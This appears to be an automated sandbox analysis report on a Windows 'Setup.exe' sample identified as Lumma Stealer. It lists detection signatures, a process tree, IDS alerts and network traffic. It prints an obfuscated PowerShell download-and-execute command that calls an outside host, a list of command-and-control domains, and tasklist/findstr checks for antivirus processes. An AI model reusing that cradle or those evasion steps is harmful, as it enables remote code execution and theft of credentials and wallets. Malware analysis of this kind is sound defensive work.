Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1584737
MD5: ede2e7d64a73a46b252525a4136b47bf
SHA1: 5025d1d817d6d9f24f1d5197759fafe7cde6f0da
SHA256: bda506a1ae73f5514cbf100a95f54aeb2877368702fad312fabf0f2641b34f91
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Setup.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: EDE2E7D64A73A46B252525A4136B47BF)
    • cmd.exe (PID: 5892 cmdline: "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5620 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5516 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6536 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6388 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6596 cmdline: cmd /c md 811185 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6672 cmdline: extrac32 /Y /E Thousand MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 6640 cmdline: findstr /V "makes" Makes MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5808 cmdline: cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6668 cmdline: cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard c MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • M.com (PID: 1532 cmdline: M.com c MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 1220 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • T0VC3MU5SNNFXQB43V5.exe (PID: 5608 cmdline: "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • T0VC3MU5SNNFXQB43V5.tmp (PID: 1120 cmdline: "C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$60296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
            • T0VC3MU5SNNFXQB43V5.exe (PID: 5556 cmdline: "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
              • T0VC3MU5SNNFXQB43V5.tmp (PID: 6180 cmdline: "C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
                • timeout.exe (PID: 6360 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
                  • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 4432 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 1712 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 4980 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 1656 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7040 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 6380 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5892 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • cmd.exe (PID: 4676 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 3472 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1268 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 1288 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5676 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5168 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 3288 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5516 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1568 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • BrightLib.exe (PID: 5428 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
      • choice.exe (PID: 4308 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3772 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • find.exe (PID: 5320 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["framekgirus.shop", "yokesandusj.sbs", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "wholersorie.shop", "rabidcowse.shop", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "hRjzG3--TRON"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

System Summary

Source: Process started. Six detections matched the same process-creation event, with these rule authors:
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • frack113
  • Florian Roth (Nextron Systems)
  • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data (identical in all six matches):
  • Command / CommandLine / ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
  • CommandLine|base64offset|contains: ^
  • Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  • ParentCommandLine: M.com c
  • ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
  • ParentProcessId: 1532
  • ParentProcessName: M.com
  • ProcessId: 1220
  • ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data:
  • Command / CommandLine / ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
  • CommandLine|base64offset|contains: ~)
  • Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\findstr.exe
  • ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd
  • ParentImage: C:\Windows\SysWOW64\cmd.exe
  • ParentProcessId: 5892
  • ParentProcessName: cmd.exe
  • ProcessId: 6388
  • ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T12:16:42.314150+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49842 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:43.277898+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49846 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:44.508617+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49853 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:45.564061+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49860 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:46.693463+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49867 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:48.136643+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49877 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:49.164360+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49888 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:50.509865+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49897 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:52.602900+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49910 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:53.792055+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49920 | 185.161.251.21 | 443 | TCP
2025-01-06T12:16:54.558874+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49927 | 172.67.208.58 | 443 | TCP
2025-01-06T12:16:42.805604+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49842 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:43.751262+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49846 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:53.072951+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49910 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:42.805604+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49842 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:43.751262+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49846 | 104.21.44.159 | 443 | TCP
2025-01-06T12:16:55.007739+0100 | 2008438 | 1 | A Network Trojan was detected | 172.67.208.58 | 443 | 192.168.2.5 | 49927 | TCP
2025-01-06T12:16:45.040597+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49853 | 104.21.44.159 | 443 | TCP

AV Detection

Source: https://dfgh.online/invoker.php?compName=user-PC, Avira URL Cloud: Label: malware
Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "yokesandusj.sbs", "cloudewahsj.shop", "tirepublicerj.shop", "noisycuttej.shop", "wholersorie.shop", "rabidcowse.shop", "nearycrepso.shop", "abruptyopsn.shop"], "Build id": "hRjzG3--TRON"}
Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe, ReversingLabs: Detection: 78%
Source: Setup.exe, Virustotal: Detection: 8%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 84.8% probability
Source: 0000000D.00000003.2478687315.000000000462E000.00000004.00000800.00020000.00000000.sdmp, String decryptor:
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • hRjzG3--TRON
Source: Setup.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49842 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49846 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49867 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49877 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49888 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49897 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49910 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49920 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: Setup.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb| source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbT\ source: powershell.exe, 00000011.00000002.2558473325.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ilit.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2558541712.0000000006EC5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000031.00000002.3131750928.000000003884C000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3131874592.0000000038BA0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2553928268.0000000002699000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Setup.exe, Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\Setup.exe, Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\Setup.exe, Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\

        Networking

        Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49846 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49846 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49853 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49842 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49842 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49910 -> 104.21.44.159:443
        Source: Malware configuration extractor URLs: framekgirus.shop
        Source: Malware configuration extractor URLs: yokesandusj.sbs
        Source: Malware configuration extractor URLs: cloudewahsj.shop
        Source: Malware configuration extractor URLs: tirepublicerj.shop
        Source: Malware configuration extractor URLs: noisycuttej.shop
        Source: Malware configuration extractor URLs: wholersorie.shop
        Source: Malware configuration extractor URLs: rabidcowse.shop
        Source: Malware configuration extractor URLs: nearycrepso.shop
        Source: Malware configuration extractor URLs: abruptyopsn.shop
        Source: Joe Sandbox View IP Address: 185.161.251.21
        Source: Joe Sandbox View IP Address: 172.67.208.58
        Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
        Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49842 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49860 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49877 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49867 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49888 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49897 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49846 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49853 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49910 -> 104.21.44.159:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49920 -> 185.161.251.21:443
        Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49927 -> 172.67.208.58:443
        Source: Network traffic Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.208.58:443 -> 192.168.2.5:49927
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 78 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=45GPJ30OVSS5KLSQSA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12834 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UMB2YZ25PIS3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15040 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NR43MFZ36ZVA6TH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20548 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KOQNT3SGI296IF2QAE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7139 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=T8MBODCY143BWRCL3J3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1257 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y2BM2JBPEECL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 593404 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 113 Host: yokesandusj.sbs
        Source: global traffic HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
        Source: global traffic HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: klipvumisui.shop
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic DNS traffic detected: DNS query: iqEcklosdyCxilSwLDOcKOPdDDq.iqEcklosdyCxilSwLDOcKOPdDDq
        Source: global traffic DNS traffic detected: DNS query: yokesandusj.sbs
        Source: global traffic DNS traffic detected: DNS query: cegu.shop
